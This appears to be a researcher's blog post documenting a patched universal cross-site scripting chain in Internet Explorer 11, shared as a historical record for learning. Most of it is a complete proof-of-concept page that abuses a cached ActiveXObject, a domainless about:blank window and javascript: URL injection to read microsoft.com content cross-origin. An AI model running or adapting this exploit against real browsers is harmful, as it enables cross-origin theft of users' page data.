UXSS on IE11: Domainless about:blank Full Cross-Origin Access

This was a port of an earlier UXSS chain (originally found on IE10) updated to reproduce on IE11 RTM. The technique used a server-side redirect, a cached ActiveXObject reference, and a domainless about:blank window to read the contents of microsoft.com from an attacker-controlled page.

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_xDomain_about_blank_full_access</title>
</head>
<body>
<script language="JavaScript">
function main()
{
	var redirUrl = location.href.substring(0,location.href.lastIndexOf('/')+1) + "redir.aspx";
	var win = window.open(redirUrl,"RANDOM_NAME","width=100,height=100");
	win.setTimeout('opener._ActiveXObject = ActiveXObject;alert("Do not close this alert please");', 100);
	var dhtmlFile = win.eval('new ActiveXObject("htmlFile")');
	setTimeout('openBlankWindow()', 1000);
}

function openBlankWindow()
{
	var blankHtmlFile = new _ActiveXObject("htmlFile");
	var metaredirURL = (location.href.substring(0,location.href.lastIndexOf('/')+1)) + "metaredir.html";
	
	var code = 'w.document.write(\'Wait a few seconds please. Loading Microsoft inside an iFrame...<br /><br />' +
	'<script>'+
	'	function injectScript(){'+
	'	window[0][0].location = "javascript:alert(parent.document.body.innerText)";'+
	'	}'+
	'	function loadBlank(){'+
	'	window[0][0].location = "'+ metaredirURL +'";'+
	'	setTimeout("injectScript()", 3000);'+
	'	}'+
	'<\/script>'+
	'<iframe onload="loadBlank()" width=400 height=200 src="http://www.microsoft.com"></iframe>\');'+
	'w.document.close()';

	blankHtmlFile.parentWindow.setTimeout('w=window.open("","","width=450,height=280")');
	blankHtmlFile.parentWindow.setTimeout(code, 1000);
}
</script>
</body>
</html>

The IE11-specific adjustment was opening the redirect window with its full path URL (required to avoid the pop-up blocker) and using a two-step setTimeout to open the domainless window before writing to it. The rest of the chain — cached ActiveXObject, domainless blank window, microsoft.com iframe, meta-refresh sub-iframe to about:blank, then javascript: URL injection — was the same as the earlier variant. The vulnerability lay in the fact that a domainless about:blank could navigate a same-origin (microsoft.com) about:blank sub-frame using javascript: URLs.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script via Web Worker Spawned in onpagehide] :: [Resident Script via htmlFile ActiveXObject in New Tab] >